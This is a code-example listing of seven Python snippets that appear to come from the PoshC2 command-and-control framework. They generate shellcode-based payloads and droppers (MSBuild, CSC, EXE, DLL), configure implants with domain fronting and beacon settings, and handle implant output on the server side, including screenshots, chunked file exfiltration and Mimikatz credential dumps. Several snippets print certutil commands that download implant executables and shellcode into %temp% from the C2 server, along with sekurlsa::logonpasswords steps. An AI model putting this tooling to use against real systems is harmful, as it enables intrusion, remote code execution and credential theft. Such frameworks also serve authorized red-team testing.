Ejemplo n.º 1
0
 def CreateMsbuild(self, name=""):
     x86filename = "%s%s" % (self.BaseDirectory, name + "Posh_v4_x86_Shellcode.bin")
     x64filename = "%s%s" % (self.BaseDirectory, name + "Posh_v4_x64_Shellcode.bin")
     with open(x86filename, "rb") as b86:
         x86base64 = base64.b64encode(b86.read())
     with open(x64filename, "rb") as b64:
         x64base64 = base64.b64encode(b64.read())
     with open("%scsc.cs" % PayloadTemplatesDirectory, 'r') as f:
         content = f.read()
     ccode = str(content).replace("#REPLACEME32#", x86base64.decode('UTF-8'))
     ccode = str(content).replace("#REPLACEME64#", x64base64.decode('UTF-8'))
     filename = "%s%scsc.cs" % (self.BaseDirectory, name)
     output_file = open(filename, 'w')
     output_file.write(ccode)
     output_file.close()
     self.QuickstartLog("")
     self.QuickstartLog("CSC file written to: %s%scsc.cs" % (self.BaseDirectory, name))
     with open("%smsbuild.xml" % PayloadTemplatesDirectory, 'r') as f:
         msbuild = f.read()
     projname = randomuri()
     msbuild = str(msbuild).replace("#REPLACEME32#", x86base64.decode('UTF-8'))
     msbuild = str(msbuild).replace("#REPLACEME64#", x64base64.decode('UTF-8'))
     msbuild = str(msbuild).replace("#REPLACEMERANDSTRING#", str(projname))
     self.QuickstartLog("Msbuild file written to: %s%smsbuild.xml" % (self.BaseDirectory, name))
     filename = "%s%smsbuild.xml" % (self.BaseDirectory, name)
     output_file = open(filename, 'w')
     output_file.write(msbuild)
     output_file.close()
Ejemplo n.º 2
0
def do_createnewpayload(user, command, creds=None):
    params = re.compile("createnewpayload ", re.IGNORECASE)
    params = params.sub("", command)
    creds = None
    if "-credid" in params:
        creds, params = get_creds_from_params(params, user)
        if creds is None:
            return
        if not creds['Password']:
            print_bad("This command does not support credentials with hashes")
            input("Press Enter to continue...")
            clear()
            return

    name = input(Colours.GREEN + "Proxy Payload Name: e.g. Scenario_One ")
    comms_url = input("Comms URL: https://www.example.com ")
    domain = (comms_url.lower()).replace('https://', '')
    domain = domain.replace('http://', '')
    domainfront = input("Domain front hostname: jobs.azureedge.net ")
    proxyurl = input("Proxy URL: .e.g. http://10.150.10.1:8080 ")

    randomid = randomuri(5)
    proxyuser = ""
    proxypass = ""
    credsexpire = ""
    if proxyurl:
        if creds is not None:
            proxyuser = "******" % (creds['Domain'], creds['Username'])
            proxypass = creds['Password']
        else:
            proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ")
            proxypass = input("Proxy Password: e.g. Password1 ")
        credsexpire = input(
            Colours.GREEN +
            "Password/Account Expiration Date: .e.g. 15/03/2018 ")
        imurl = "%s?p" % get_newimplanturl()
    else:
        imurl = get_newimplanturl()
    C2 = get_c2server_all()
    newPayload = Payloads(C2[5], C2[2], comms_url, domainfront, C2[8],
                          proxyuser, proxypass, proxyurl, "", "", C2[17],
                          C2[18], C2[19], imurl, PayloadsDirectory)
    newPayload.CreateRaw("%s_" % name)
    newPayload.CreateDlls("%s_" % name)
    newPayload.CreateShellcode("%s_" % name)
    newPayload.CreateEXE("%s_" % name)
    newPayload.CreateMsbuild("%s_" % name)
    newPayload.CreatePython("%s_" % name)
    newPayload.CreateCS("%s_" % name)
    new_urldetails(randomid, comms_url, domainfront, proxyurl, proxyuser,
                   proxypass, credsexpire)
    print_good("Created new payloads")
    input("Press Enter to continue...")
    clear()
Ejemplo n.º 3
0
    def CreateAll(self, name=""):
        self.QuickstartLog(Colours.END)
        self.QuickstartLog(Colours.END + "Payloads/droppers using powershell.exe:" + Colours.END)
        self.QuickstartLog(Colours.END + "=======================================" + Colours.END)
        self.CreateRaw(name)
        self.CreateHTA(name)
        self.CreateSCT(name)

        self.QuickstartLog(Colours.END)
        self.QuickstartLog(Colours.END + "Payloads/droppers using shellcode:" + Colours.END)
        self.QuickstartLog(Colours.END + "==================================" + Colours.END)
        self.CreateDroppers(name)
        self.CreateDlls(name)
        self.CreateShellcode(name)
        self.CreateDotNet2JS(name)
        self.CreateEXE(name)
        self.CreateMsbuild(name)
        self.CreateCsc(name)
        self.CreateDonutShellcode(name)
        self.CreatePython(name)
        self.CreateDynamicCodeTemplate(name)

        self.QuickstartLog(Colours.END)
        self.QuickstartLog("Download Posh64 & Posh32 executables using certutil:" + Colours.GREEN)
        self.QuickstartLog("certutil -urlcache -split -f %s %%temp%%\\%s.exe" % (f"{self.FirstURL}/{self.QuickCommand}_ex86", randomuri()))
        self.QuickstartLog("certutil -urlcache -split -f %s %%temp%%\\%s.exe" % (f"{self.FirstURL}/{self.QuickCommand}_ex64", randomuri()))

        self.QuickstartLog(Colours.END)
        self.QuickstartLog("Download Posh/Sharp x86 and x64 shellcode from the webserver:" + Colours.GREEN)
        self.QuickstartLog("certutil -urlcache -split -f %s %%temp%%\\%s.bin" %
                           (f"{self.FirstURL}/{self.QuickCommand}s/64/portal", randomuri()))
        self.QuickstartLog("certutil -urlcache -split -f %s %%temp%%\\%s.bin" %
                           (f"{self.FirstURL}/{self.QuickCommand}s/86/portal", randomuri()))
        self.QuickstartLog("certutil -urlcache -split -f %s %%temp%%\\%s.bin" %
                           (f"{self.FirstURL}/{self.QuickCommand}p/64/portal", randomuri()))
        self.QuickstartLog("certutil -urlcache -split -f %s %%temp%%\\%s.bin" %
                           (f"{self.FirstURL}/{self.QuickCommand}p/86/portal", randomuri()))

        self.QuickstartLog(Colours.END)
        self.QuickstartLog(f"pbind-connect hostname {self.PBindPipeName} {self.PBindSecret}")
        self.BuildDynamicPayloads(name)
Ejemplo n.º 4
0
    def __init__(self, ipaddress, pivot, domain, user, hostname, arch, pid,
                 proxy):
        self.RandomURI = randomuri()
        self.Label = None
        self.User = user
        self.Hostname = hostname
        self.IPAddress = ipaddress
        self.Key = gen_key().decode("utf-8")
        self.FirstSeen = (
            datetime.datetime.now()).strftime("%d/%m/%Y %H:%M:%S")
        self.LastSeen = (datetime.datetime.now()).strftime("%d/%m/%Y %H:%M:%S")
        self.PID = pid
        self.Proxy = proxy
        self.Arch = arch
        self.Domain = domain
        self.DomainFrontHeader = get_dfheader()
        self.Alive = "Yes"
        self.UserAgent = get_defaultuseragent()
        self.Sleep = get_defaultbeacon()
        self.ModsLoaded = ""
        self.Jitter = Jitter
        self.ImplantID = ""
        self.Pivot = pivot
        self.KillDate = get_killdate()
        self.ServerURL = select_item("PayloadCommsHost", "C2Server")
        self.AllBeaconURLs = get_otherbeaconurls()
        self.AllBeaconImages = get_images()
        self.SharpCore = """
RANDOMURI19901%s10991IRUMODNAR
URLS10484390243%s34209348401SLRU
KILLDATE1665%s5661ETADLLIK
SLEEP98001%s10089PEELS
JITTER2025%s5202RETTIJ
NEWKEY8839394%s4939388YEKWEN
IMGS19459394%s49395491SGMI""" % (self.RandomURI, self.AllBeaconURLs,
                                 self.KillDate, self.Sleep, self.Jitter,
                                 self.Key, self.AllBeaconImages)
        with open("%spy_dropper.sh" % (PayloadsDirectory), 'rb') as f:
            self.PythonImplant = base64.b64encode(f.read()).decode("utf-8")
        py_implant_core = open(
            "%s/Implant-Core.py" % PayloadTemplatesDirectory, 'r').read()
        self.PythonCore = py_implant_core % (
            self.DomainFrontHeader, self.Sleep, self.AllBeaconImages,
            self.AllBeaconURLs, self.KillDate, self.PythonImplant, self.Jitter,
            self.Key, self.RandomURI, self.UserAgent)
        ps_implant_core = open(
            "%s/Implant-Core.ps1" % PayloadTemplatesDirectory, 'r').read()
        self.PSCore = ps_implant_core % (
            self.Key, self.Jitter, self.Sleep, self.AllBeaconImages,
            self.RandomURI, self.RandomURI, self.KillDate, self.AllBeaconURLs
        )  # Add all db elements def display(self):
Ejemplo n.º 5
0
    def CreateCSCFiles(self, payloadtype, name=""):
        self.QuickstartLog("Payload written to: %s%s%s_csc.cs" % (self.BaseDirectory, name, payloadtype.value))

        if payloadtype == PayloadType.Posh_v2:
            with open("%s%s" % (self.BaseDirectory, name + "Posh_v2_x86_Shellcode.bin"), "rb") as f:
                x86base64 = f.read()
            with open("%s%s" % (self.BaseDirectory, name + "Posh_v2_x64_Shellcode.bin"), "rb") as f:
                x64base64 = f.read()
        elif payloadtype == PayloadType.Posh_v4:
            with open("%s%s" % (self.BaseDirectory, name + "Posh_v4_x86_Shellcode.bin"), "rb") as f:
                x86base64 = f.read()
            with open("%s%s" % (self.BaseDirectory, name + "Posh_v4_x64_Shellcode.bin"), "rb") as f:
                x64base64 = f.read()
        elif payloadtype == PayloadType.Sharp:
            with open("%s%s" % (self.BaseDirectory, name + "Sharp_v4_x86_Shellcode.bin"), "rb") as f:
                x86base64 = f.read()
            with open("%s%s" % (self.BaseDirectory, name + "Sharp_v4_x64_Shellcode.bin"), "rb") as f:
                x64base64 = f.read()
        elif payloadtype == PayloadType.PBind:
            with open("%s%s" % (self.BaseDirectory, name + "PBind_v4_x86_Shellcode.bin"), "rb") as f:
                x86base64 = f.read()
            with open("%s%s" % (self.BaseDirectory, name + "PBind_v4_x64_Shellcode.bin"), "rb") as f:
                x64base64 = f.read()
        elif payloadtype == PayloadType.PBindSharp:
            with open("%s%s" % (self.BaseDirectory, name + "PBindSharp_v4_x86_Shellcode.bin"), "rb") as f:
                x86base64 = f.read()
            with open("%s%s" % (self.BaseDirectory, name + "PBindSharp_v4_x64_Shellcode.bin"), "rb") as f:
                x64base64 = f.read()

        x86base64 = base64.b64encode(x86base64)
        x64base64 = base64.b64encode(x64base64)

        with open("%scsc.cs" % (PayloadTemplatesDirectory), 'r') as f:
            content = f.read()
        content = str(content) \
            .replace("#REPLACEME32#", x86base64.decode('UTF-8')) \
            .replace("#REPLACEME64#", x64base64.decode('UTF-8')) \
            .replace("#REPLACEMERANDSTRING#", str(randomuri()))

        with open("%s%s%s_csc.cs" % (self.BaseDirectory, name, payloadtype.value), 'w') as f:
            f.write(content)
Ejemplo n.º 6
0
def newTaskOutput(uriPath, cookieVal, post_data, wsclient=False):
    now = datetime.datetime.now()
    all_implants = DB.get_implants_all()
    if not all_implants:
        print_bad(
            "Received post request but no implants in database... has the project been cleaned but you're using the same URLs?"
        )
        return
    for implant in all_implants:
        implantID = implant.ImplantID
        RandomURI = implant.RandomURI
        Hostname = implant.Hostname
        encKey = implant.Key
        Domain = implant.Domain
        User = implant.User
        if RandomURI in uriPath and cookieVal:
            DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"),
                                       RandomURI)
            decCookie = decrypt(encKey, cookieVal)
            rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
            if decCookie.startswith("Error"):
                print(Colours.RED)
                print("The multicmd errored: ")
                print(rawoutput)
                print(Colours.GREEN)
                return

            cookieMsg = ""
            if "-" in decCookie:
                decCookie = decCookie.strip('\x00')
                splt = decCookie.split("-")
                if not splt[0].isdigit():
                    print(Colours.RED +
                          "[!] Cookie %s is invalid" % decCookie +
                          Colours.GREEN)
                    return
                else:
                    taskId = str(int(splt[0]))
                    cookieMsg = splt[1]
            else:
                taskId = str(int(decCookie.strip('\x00')))
            taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
            if taskId != "99999":
                executedCmd = DB.get_cmd_from_task_id(taskId)
                task_owner = DB.get_task_owner(taskId)
            else:
                print(Colours.END)
                timenow = now.strftime("%Y-%m-%d %H:%M:%S")
                print(
                    f"Background task against implant {implantID} on host {Domain}\\{User} @ {Hostname} ({timenow}) (output appended to %sbackground-data.txt)"
                    % ReportsDirectory)
                print(Colours.GREEN)
                print(rawoutput)
                miscData = open(("%sbackground-data.txt" % ReportsDirectory),
                                "a+")
                miscData.write(rawoutput)
                return
            print(Colours.GREEN)
            if task_owner is not None:
                print(
                    "Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)"
                    % (taskIdStr, task_owner, implantID, Domain, User,
                       Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
            else:
                print(
                    "Task %s returned against implant %s on host %s\\%s @ %s (%s)"
                    % (taskIdStr, implantID, Domain, User, Hostname,
                       now.strftime("%Y-%m-%d %H:%M:%S")))
            try:
                outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput)
                outputParsed = outputParsed.rstrip()
            except Exception:
                pass
            if cookieMsg is not None and cookieMsg.lower().startswith(
                    "pwrstatusmsg"):
                translate_power_status(outputParsed, RandomURI)
                return
            if "loadmodule" in executedCmd and len(outputParsed.split()) == 0:
                print("Module loaded successfully")
                DB.update_task(taskId, "Module loaded successfully")
            elif "pbind-connect " in executedCmd and "PBind-Connected" in outputParsed or "PBind PBind start" in executedCmd and "PBind-Connected" in outputParsed:
                outputParsed = re.search("PBind-Connected:.*", outputParsed)
                outputParsed = outputParsed[0].replace("PBind-Connected: ", "")
                Domain, User, Hostname, Arch, PID, Proxy = str(
                    outputParsed).split(";")
                Proxy = Proxy.replace("\x00", "")
                if "\\" in User:
                    User = User[User.index("\\") + 1:]

                PivotString = "C# PBind"
                if "pbind-command run-exe PBind PBind start" in executedCmd:
                    PivotString = "C# PBind Pivot"

                newImplant = Implant(implantID, PivotString, str(Domain),
                                     str(User), str(Hostname), Arch, PID, None)
                newImplant.save()
                newImplant.display()
                newImplant.autoruns()
                if "pbind-command run-exe PBind PBind start" in executedCmd:
                    DB.new_task("pbind-pivot-loadmodule Stage2-Core.exe",
                                "autoruns", RandomURI)
                else:
                    DB.new_task("pbind-loadmodule Stage2-Core.exe", "autoruns",
                                RandomURI)

            elif "fcomm-connect " in executedCmd and "FComm-Connected" in outputParsed:
                outputParsed = re.search("FComm-Connected:.*", outputParsed)
                outputParsed = outputParsed[0].replace("FComm-Connected: ", "")
                Domain, User, Hostname, Arch, PID, Proxy = str(
                    outputParsed).split(";")
                Proxy = Proxy.replace("\x00", "")
                if "\\" in User:
                    User = User[User.index("\\") + 1:]
                newImplant = Implant(implantID, "C# FComm", str(Domain),
                                     str(User), str(Hostname), Arch, PID, None)
                newImplant.save()
                newImplant.display()
                newImplant.autoruns()
                DB.new_task("fcomm-loadmodule Stage2-Core.exe", "autoruns",
                            RandomURI)
            elif executedCmd.lower().startswith("beacon "):
                new_sleep = executedCmd.replace('beacon ', '').strip()
                DB.update_sleep(new_sleep, RandomURI)
            elif "get-screenshot" in executedCmd.lower():
                try:
                    decoded = base64.b64decode(outputParsed)
                    filename = implant.User + "-" + now.strftime(
                        "%m%d%Y%H%M%S_" + randomuri())
                    output_file = open(
                        '%s%s.png' % (DownloadsDirectory, filename), 'wb')
                    print("Screenshot captured: %s%s.png" %
                          (DownloadsDirectory, filename))
                    DB.update_task(
                        taskId, "Screenshot captured: %s%s.png" %
                        (DownloadsDirectory, filename))
                    output_file.write(decoded)
                    output_file.close()
                except Exception:
                    DB.update_task(
                        taskId,
                        "Screenshot not captured, the screen could be locked or this user does not have access to the screen!"
                    )
                    print(
                        "Screenshot not captured, the screen could be locked or this user does not have access to the screen!"
                    )
            elif (executedCmd.lower().startswith("$shellcode64")) or (
                    executedCmd.lower().startswith("$shellcode64")):
                DB.update_task(taskId, "Upload shellcode complete")
                print("Upload shellcode complete")
            elif (executedCmd.lower().startswith(
                    "run-exe core.program core inject-shellcode"
            )) or (executedCmd.lower().startswith(
                    "pbind-command run-exe core.program core inject-shellcode"
            )) or (executedCmd.lower().startswith(
                    "pbind-pivot-command run-exe core.program core inject-shellcode"
            )):
                DB.update_task(taskId, "Upload shellcode complete")
                print(outputParsed)
            elif "download-file" in executedCmd.lower():
                try:
                    filename = executedCmd.lower().replace(
                        "download-files ", "")
                    filename = filename.replace("download-file ", "")
                    filename = filename.replace("-source ", "")
                    filename = filename.replace("..", "")
                    filename = filename.replace("'", "")
                    filename = filename.replace('"', "")
                    filename = filename.replace("\\", "/")
                    directory, filename = filename.rsplit('/', 1)
                    filename = filename.rstrip('\x00')
                    original_filename = filename.strip()

                    if not original_filename:
                        directory = directory.rstrip('\x00')
                        directory = directory.replace("/", "_").replace(
                            "\\", "_").strip()
                        original_filename = directory

                    try:
                        if rawoutput.startswith("Error"):
                            print("Error downloading file: ")
                            print(rawoutput)
                            break
                        chunkNumber = rawoutput[:5]
                        totalChunks = rawoutput[5:10]
                    except Exception:
                        chunkNumber = rawoutput[:5].decode("utf-8")
                        totalChunks = rawoutput[5:10].decode("utf-8")

                    if (chunkNumber == "00001") and os.path.isfile(
                            '%s%s' % (DownloadsDirectory, filename)):
                        counter = 1
                        while (os.path.isfile('%s%s' %
                                              (DownloadsDirectory, filename))):
                            if '.' in filename:
                                filename = original_filename[:original_filename
                                                             .rfind(
                                                                 '.'
                                                             )] + '-' + str(
                                                                 counter
                                                             ) + original_filename[
                                                                 original_filename
                                                                 .rfind('.'):]
                            else:
                                filename = original_filename + '-' + str(
                                    counter)
                            counter += 1
                    if (chunkNumber != "00001"):
                        counter = 1
                        if not os.path.isfile('%s%s' %
                                              (DownloadsDirectory, filename)):
                            print(
                                "Error trying to download part of a file to a file that does not exist: %s"
                                % filename)
                        while (os.path.isfile('%s%s' %
                                              (DownloadsDirectory, filename))):
                            # First find the 'next' file would be downloaded to
                            if '.' in filename:
                                filename = original_filename[:original_filename
                                                             .rfind(
                                                                 '.'
                                                             )] + '-' + str(
                                                                 counter
                                                             ) + original_filename[
                                                                 original_filename
                                                                 .rfind('.'):]
                            else:
                                filename = original_filename + '-' + str(
                                    counter)
                            counter += 1
                        if counter != 2:
                            # Then actually set the filename to this file - 1 unless it's the first one and exists without a counter
                            if '.' in filename:
                                filename = original_filename[:original_filename
                                                             .rfind(
                                                                 '.'
                                                             )] + '-' + str(
                                                                 counter - 2
                                                             ) + original_filename[
                                                                 original_filename
                                                                 .rfind('.'):]
                            else:
                                filename = original_filename + '-' + str(
                                    counter - 2)
                        else:
                            filename = original_filename
                    print("Download file part %s of %s to: %s" %
                          (chunkNumber, totalChunks, filename))
                    DB.update_task(
                        taskId, "Download file part %s of %s to: %s" %
                        (chunkNumber, totalChunks, filename))
                    output_file = open('%s%s' % (DownloadsDirectory, filename),
                                       'ab')
                    try:
                        output_file.write(rawoutput[10:])
                    except Exception:
                        output_file.write(rawoutput[10:].encode("utf-8"))
                    output_file.close()
                except Exception as e:
                    DB.update_task(taskId, "Error downloading file %s " % e)
                    print("Error downloading file %s " % e)
                    traceback.print_exc()

            elif "safetydump" in executedCmd.lower():
                rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
                if rawoutput.startswith("[-]") or rawoutput.startswith(
                        "ErrorCmd"):
                    DB.update_task(taskId, rawoutput)
                    print(rawoutput)
                else:
                    dumpname = "SafetyDump-Task-%s.b64" % taskIdStr
                    dumppath = "%s%s" % (DownloadsDirectory, dumpname)
                    open(dumppath, 'w').write(rawoutput)
                    message = "Dump written to: %s" % dumppath
                    message = message + "\n The base64 blob needs decoding, e.g. on Windows to use Mimikatz:"
                    message = message + "\n     $filename = '.\\%s'" % dumpname
                    message = message + "\n     $b64 = Get-Content $filename"
                    message = message + "\n     $bytes = [System.Convert]::FromBase64String($b64)"
                    message = message + "\n     [io.file]::WriteAllBytes(((Get-Item -Path \".\\\").FullName) + '\\safetydump.dmp', $bytes)"
                    message = message + "\n     ./mimikatz.exe"
                    message = message + "\n     sekurlsa::minidump safetydump.dmp"
                    message = message + "\n     sekurlsa::logonpasswords"
                    message = message + "\nOr to just decode on Linux:"
                    message = message + f"\n     base64 -id {dumpname} > dump.bin"
                    DB.update_task(taskId, message)
                    print(message)

            elif (executedCmd.lower().startswith("run-exe safetykatz")
                  or "invoke-mimikatz" in executedCmd
                  or executedCmd.lower().startswith("pbind-")
                  or executedCmd.lower().startswith("fcomm-command")
                  or executedCmd.lower().startswith("run-dll sharpsploit")
                  ) and "logonpasswords" in outputParsed.lower():
                print("Parsing Mimikatz Output")
                DB.update_task(taskId, outputParsed)
                process_mimikatz(outputParsed)
                print(Colours.GREEN)
                print(outputParsed + Colours.END)

            else:
                DB.update_task(taskId, outputParsed)
                print(Colours.GREEN)
                print(outputParsed + Colours.END)
Ejemplo n.º 7
0
    def do_POST(self):
        """Respond to a POST request."""
        try:
            self.server_version = ServerHeader
            self.sys_version = ""
            try:
                content_length = int(self.headers['Content-Length'])
            except:
                content_length = 0
            self.cookieHeader = self.headers.get('Cookie')
            try:
                cookieVal = (self.cookieHeader).replace("SessionID=", "")
            except:
                cookieVal = ""
            post_data = self.rfile.read(content_length)
            logging.info(
                "POST request,\nPath: %s\nHeaders:\n%s\n\nBody:\n%s\n",
                str(self.path), str(self.headers), post_data)
            now = datetime.datetime.now()
            result = get_implants_all()
            if not result:
                print_bad(
                    "Received post request but no implants in database... has the project been cleaned but you're using the same URLs?"
                )
                return
            for i in result:
                implantID = i[0]
                RandomURI = i[1]
                Hostname = i[3]
                encKey = i[5]
                Domain = i[11]
                User = i[2]
                if RandomURI in self.path and cookieVal:
                    update_implant_lastseen(now.strftime("%d/%m/%Y %H:%M:%S"),
                                            RandomURI)
                    decCookie = decrypt(encKey, cookieVal)
                    rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
                    if decCookie.startswith("Error"):
                        print(Colours.RED)
                        print("The multicmd errored: ")
                        print(rawoutput)
                        print(Colours.GREEN)
                        return
                    taskId = str(int(decCookie.strip('\x00')))
                    taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
                    executedCmd = get_cmd_from_task_id(taskId)
                    task_owner = get_task_owner(taskId)
                    print(Colours.GREEN)
                    if task_owner is not None:
                        print(
                            "Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)"
                            % (taskIdStr, task_owner, implantID, Domain, User,
                               Hostname, now.strftime("%d/%m/%Y %H:%M:%S")))
                    else:
                        print(
                            "Task %s returned against implant %s on host %s\\%s @ %s (%s)"
                            % (taskIdStr, implantID, Domain, User, Hostname,
                               now.strftime("%d/%m/%Y %H:%M:%S")))
                    try:
                        outputParsed = re.sub(r'123456(.+?)654321', '',
                                              rawoutput)
                        outputParsed = outputParsed.rstrip()
                    except Exception:
                        pass

                    if "loadmodule" in executedCmd:
                        print("Module loaded successfully")
                        update_task(taskId, "Module loaded successfully")
                    elif executedCmd.lower().startswith("beacon "):
                        new_sleep = executedCmd.replace('beacon ', '').strip()
                        update_sleep(new_sleep, RandomURI)
                    elif "get-screenshot" in executedCmd.lower():
                        try:
                            decoded = base64.b64decode(outputParsed)
                            filename = i[3] + "-" + now.strftime(
                                "%m%d%Y%H%M%S_" + randomuri())
                            output_file = open(
                                '%s%s.png' % (DownloadsDirectory, filename),
                                'wb')
                            print("Screenshot captured: %s%s.png" %
                                  (DownloadsDirectory, filename))
                            update_task(
                                taskId, "Screenshot captured: %s%s.png" %
                                (DownloadsDirectory, filename))
                            output_file.write(decoded)
                            output_file.close()
                        except Exception:
                            update_task(
                                taskId,
                                "Screenshot not captured, the screen could be locked or this user does not have access to the screen!"
                            )
                            print(
                                "Screenshot not captured, the screen could be locked or this user does not have access to the screen!"
                            )
                    elif (executedCmd.lower().startswith("$shellcode64")) or (
                            executedCmd.lower().startswith("$shellcode64")):
                        update_task(taskId, "Upload shellcode complete")
                        print("Upload shellcode complete")
                    elif (executedCmd.lower().startswith(
                            "run-exe core.program core inject-shellcode")):
                        update_task(taskId, "Upload shellcode complete")
                        print(outputParsed)
                    elif "download-file" in executedCmd.lower():
                        try:
                            filename = executedCmd.lower().replace(
                                "download-files ", "")
                            filename = filename.replace("download-file ", "")
                            filename = filename.replace("-source ", "")
                            filename = filename.replace("..", "")
                            filename = filename.replace("'", "")
                            filename = filename.replace('"', "")
                            filename = filename.replace("\\", "/")
                            directory, filename = filename.rsplit('/', 1)
                            filename = filename.rstrip('\x00')
                            original_filename = filename.strip()

                            if not original_filename:
                                directory = directory.rstrip('\x00')
                                directory = directory.replace(
                                    "/", "_").replace("\\", "_").strip()
                                original_filename = directory

                            try:
                                if rawoutput.startswith("Error"):
                                    print("Error downloading file: ")
                                    print(rawoutput)
                                    break
                                chunkNumber = rawoutput[:5]
                                totalChunks = rawoutput[5:10]
                            except Exception:
                                chunkNumber = rawoutput[:5].decode("utf-8")
                                totalChunks = rawoutput[5:10].decode("utf-8")

                            if (chunkNumber == "00001") and os.path.isfile(
                                    '%s%s' % (DownloadsDirectory, filename)):
                                counter = 1
                                while (os.path.isfile(
                                        '%s%s' %
                                    (DownloadsDirectory, filename))):
                                    if '.' in filename:
                                        filename = original_filename[:original_filename.rfind(
                                            '.')] + '-' + str(
                                                counter) + original_filename[
                                                    original_filename.rfind('.'
                                                                            ):]
                                    else:
                                        filename = original_filename + '-' + str(
                                            counter)
                                    counter += 1
                            if (chunkNumber != "00001"):
                                counter = 1
                                if not os.path.isfile(
                                        '%s%s' %
                                    (DownloadsDirectory, filename)):
                                    print(
                                        "Error trying to download part of a file to a file that does not exist: %s"
                                        % filename)
                                while (os.path.isfile(
                                        '%s%s' %
                                    (DownloadsDirectory, filename))):
                                    # First find the 'next' file would be downloaded to
                                    if '.' in filename:
                                        filename = original_filename[:original_filename.rfind(
                                            '.')] + '-' + str(
                                                counter) + original_filename[
                                                    original_filename.rfind('.'
                                                                            ):]
                                    else:
                                        filename = original_filename + '-' + str(
                                            counter)
                                    counter += 1
                                if counter != 2:
                                    # Then actually set the filename to this file - 1 unless it's the first one and exists without a counter
                                    if '.' in filename:
                                        filename = original_filename[:original_filename.rfind(
                                            '.')] + '-' + str(
                                                counter - 2
                                            ) + original_filename[
                                                original_filename.rfind('.'):]
                                    else:
                                        filename = original_filename + '-' + str(
                                            counter - 2)
                                else:
                                    filename = original_filename
                            print("Download file part %s of %s to: %s" %
                                  (chunkNumber, totalChunks, filename))
                            update_task(
                                taskId, "Download file part %s of %s to: %s" %
                                (chunkNumber, totalChunks, filename))
                            output_file = open(
                                '%s%s' % (DownloadsDirectory, filename), 'ab')
                            try:
                                output_file.write(rawoutput[10:])
                            except Exception:
                                output_file.write(
                                    rawoutput[10:].encode("utf-8"))
                            output_file.close()
                        except Exception as e:
                            update_task(taskId,
                                        "Error downloading file %s " % e)
                            print("Error downloading file %s " % e)
                            traceback.print_exc()

                    elif "safetydump" in executedCmd.lower():
                        rawoutput = decrypt_bytes_gzip(encKey,
                                                       post_data[1500:])
                        if rawoutput.startswith("[-]") or rawoutput.startswith(
                                "ErrorCmd"):
                            update_task(taskId, rawoutput)
                            print(rawoutput)
                        else:
                            dumpname = "SafetyDump-Task-%s.b64" % taskIdStr
                            dumppath = "%s%s" % (DownloadsDirectory, dumpname)
                            open(dumppath, 'w').write(rawoutput)
                            message = "Dump written to: %s" % dumppath
                            message = message + "\n The base64 blob needs decoding on Windows and then Mimikatz can be run against it."
                            message = message + "\n E.g:"
                            message = message + "\n     $filename = '.\\%s'" % dumpname
                            message = message + "\n     $b64 = Get-Content $filename"
                            message = message + "\n     $bytes = [System.Convert]::FromBase64String($b64)"
                            message = message + "\n     [io.file]::WriteAllBytes(((Get-Item -Path \".\\\").FullName) + 'safetydump.dmp', $bytes)"
                            message = message + "\n     ./mimikatz.exe"
                            message = message + "\n     sekurlsa::minidump safetydump.dmp"
                            message = message + "\n     sekurlsa::logonpasswords"
                            update_task(taskId, message)
                            print(message)

                    elif (executedCmd.lower().startswith("run-exe safetykatz")
                          or executedCmd.lower().startswith("invoke-mimikatz")
                          or executedCmd.lower().startswith("pbind-command")
                          ) and "logonpasswords" in outputParsed.lower():
                        print("Parsing Mimikatz Output")
                        process_mimikatz(outputParsed)
                        update_task(taskId, outputParsed)
                        print(Colours.GREEN)
                        print(outputParsed + Colours.END)

                    else:
                        update_task(taskId, outputParsed)
                        print(Colours.GREEN)
                        print(outputParsed + Colours.END)

        except Exception as e:
            if 'broken pipe' not in str(e).lower():
                print_bad("Error handling POST request: " + e)
                traceback.print_exc()

        finally:
            try:
                UriPath = str(self.path)
                sharpurls = get_sharpurls().split(",")
                sharplist = []
                for i in sharpurls:
                    i = i.replace(" ", "")
                    i = i.replace("\"", "")
                    sharplist.append("/" + i)

                if [ele for ele in sharplist if (ele in UriPath)]:
                    try:
                        open(
                            "%swebserver.log" % PoshProjectDirectory, "a"
                        ).write(
                            "[+] Making POST connection to SharpSocks %s%s\r\n"
                            % (SocksHost, UriPath))
                        r = Request(
                            "%s%s" % (SocksHost, UriPath),
                            headers={
                                'Cookie':
                                '%s' % self.cookieHeader,
                                'User-Agent':
                                'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36'
                            })
                        res = urlopen(r, post_data)
                        sharpout = res.read()
                        self.send_response(res.getcode())
                        self.send_header("Content-type", "text/html")
                        self.send_header("Content-Length", len(sharpout))
                        self.end_headers()
                        if (len(sharpout) > 0):
                            self.wfile.write(sharpout)
                    except URLError as e:
                        try:
                            self.send_response(res.getcode())
                        except:
                            self.send_response(500)
                        self.send_header("Content-type", "text/html")
                        try:
                            self.send_header("Content-Length", len(sharpout))
                        except:
                            self.send_header("Content-Length", 0)
                        self.end_headers()
                        open(
                            "%swebserver.log" % PoshProjectDirectory, "a"
                        ).write(
                            "[-] URLError with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n"
                            % (SocksHost, UriPath, traceback.format_exc()))
                        open("%swebserver.log" % PoshProjectDirectory,
                             "a").write("[-] SharpSocks  %s\r\n" % e)
                    except Exception as e:
                        self.send_response(res.getcode())
                        self.send_header("Content-type", "text/html")
                        self.send_header("Content-Length", len(sharpout))
                        self.end_headers()
                        open(
                            "%swebserver.log" % PoshProjectDirectory, "a"
                        ).write(
                            "[-] Error with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n"
                            % (SocksHost, UriPath, traceback.format_exc()))
                        open("%swebserver.log" % PoshProjectDirectory,
                             "a").write("[-] SharpSocks  %s\r\n" % e)
                        print(
                            Colours.RED +
                            "Error with SharpSocks or old implant connection - is SharpSocks running"
                            + Colours.END)
                        print(Colours.RED + UriPath + Colours.END)
                        self.send_response(404)
                        self.send_header("Content-type", "text/html")
